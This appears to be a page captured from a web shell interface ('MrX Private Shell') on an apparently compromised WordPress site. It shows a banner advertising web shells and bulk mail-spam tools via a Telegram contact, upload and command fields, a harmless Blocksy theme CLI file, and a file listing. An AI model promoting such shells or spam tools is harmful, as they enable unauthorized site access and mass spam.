__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace Blocksy;

/**
 * Manages Blocksy theme tools.
 *
 * ## EXAMPLES
 *
 *     # List all available tools
 *     $ wp blocksy tool list
 *
 *     # Run a maintenance tool
 *     $ wp blocksy tool run regenerate_dynamic_css
 */
class ToolCli {
	public function __construct() {
		\WP_CLI::add_command('blocksy tool', $this);
	}

	/**
	 * List all available tools.
	 *
	 * ## OPTIONS
	 *
	 * [--format=<format>]
	 * : Render output in a particular format.
	 * ---
	 * default: table
	 * options:
	 *   - table
	 *   - csv
	 *   - json
	 *   - ids
	 * ---
	 *
	 * ## EXAMPLES
	 *
	 *     wp blocksy tool list
	 *     wp blocksy tool list --format=json
	 *
	 * @subcommand list
	 */
	public function tool_list($args, $assoc_args) {
		$tools = $this->get_tools();
		$items = [];

		foreach ($tools as $id => $tool) {
			$items[] = [
				'id' => $id,
				'name' => $tool['name'],
			];
		}

		$format = isset($assoc_args['format']) ? $assoc_args['format'] : 'table';

		if ($format === 'ids') {
			echo esc_html(implode(' ', array_column($items, 'id')));
			return;
		}

		\WP_CLI\Utils\format_items($format, $items, ['id', 'name']);
	}

	/**
	 * Run a maintenance tool.
	 *
	 * ## OPTIONS
	 *
	 * <tool>
	 * : The tool to run. Use 'wp blocksy tool list' to see available tools.
	 *
	 * ## EXAMPLES
	 *
	 *     wp blocksy tool run regenerate_dynamic_css
	 *     wp blocksy tool run regenerate_taxonomies_lookup
	 *
	 * @subcommand run
	 */
	public function tool_run($args, $assoc_args) {
		$tool = $args[0];
		$tools = $this->get_tools();

		if (! isset($tools[$tool])) {
			\WP_CLI::error("Unknown tool: {$tool}");
			return;
		}

		$tools[$tool]['callback']();
	}

	/**
	 * Get all registered tools.
	 *
	 * @return array
	 */
	private function get_tools() {
		return apply_filters('blocksy_cli_tools', [
			'regenerate_dynamic_css' => [
				'name' => 'Regenerate Dynamic CSS',
				'callback' => function() {
					do_action('blocksy:dynamic-css:refresh-caches');
					\WP_CLI::success('Dynamic CSS cache has been regenerated.');
				}
			]
		]);
	}
}

Filemanager

Name Type Size Permission Actions
demo.php File 10.71 KB 0775
extension.php File 3.16 KB 0775
license.php File 1.18 KB 0775
tool.php File 2.01 KB 0775
widgets.php File 1.24 KB 0775
Filemanager